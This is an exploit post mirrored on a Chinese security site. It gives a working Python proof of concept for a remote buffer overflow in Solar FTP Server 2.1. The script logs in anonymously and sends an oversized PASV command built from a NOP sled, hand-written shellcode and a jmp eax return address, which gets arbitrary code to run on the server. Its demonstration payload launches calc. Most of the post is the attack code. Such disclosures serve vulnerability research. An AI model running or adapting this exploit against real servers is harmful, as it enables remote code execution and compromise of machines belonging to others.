首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Solar FTP Server 2.1 Buffer Overflow
来源:http://www.johnleitch.net 作者:Leitch 发布时间:2011-01-12  
# ------------------------------------------------------------------------
# Software................Solar FTP Server 2.1
# Vulnerability...........Buffer Overflow
# Download................http://www.solarftp.com/
# Release Date............1/10/2011
# Tested On...............Windows XP SP3 EN
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://www.johnleitch.net/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
# 
# --Description--
# 
# A buffer overflow in Solar FTP Server 2.1 can be exploited to execute
# arbitrary code.
# 
# 
# --PoC--

import socket

host = 'localhost'

port = 21

jmp_eax = '\xBF\x66\x02\x10'

junk = '\xCC\xCC\xCC\xCC'

nop_sled = '\x90\x90\x90' + '\x90\x90\x90\x90' * 2

# Calc shellcode by yours truly. Check the task manager
# as the calc instance will not be visible.
shell_code = "\x31\xC9"\
             "\x51"\
             "\x68\x63\x61\x6C\x63"\
             "\x54"\
             "\xB8\xC7\x93\xC2\x77"\
             "\xFF\xD0"

junk2 = 'A' * 7004


bad_stuff = junk + nop_sled + shell_code + jmp_eax * 249 + junk2
    
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(8)

print 'connecting'

s.connect((host, port))

print s.recv(8192)

s.send('USER anonymous\r\n')
print s.recv(8192)

s.send('PASS x@x.com\r\n')
print s.recv(8192)

s.send('PASV ' + bad_stuff + '\r\n')
print s.recv(8192)
s.close()



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DriveCrypt <= 5.3 local kernel
·ProFTPD 1.2 - 1.3.0 sreplace B
·DriveCrypt <= 5.3 local kernel
·Mono/Moonlight Generic Type Ar
·Utimaco Safeware AG (Sophos) -
·Nokia Multimedia Player 1.0 SE
·Utimaco Safeware AG (Sophos) -
·Lotus CMS Fraise v3.0 LFI - Re
·Sinowal/Mebroot Bootkit Passwo
·MS10-081: Windows Common Contr
·MS11-002: Microsoft Data Acces
·LOCAL SOLARIS KERNEL ROOT EXPL
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved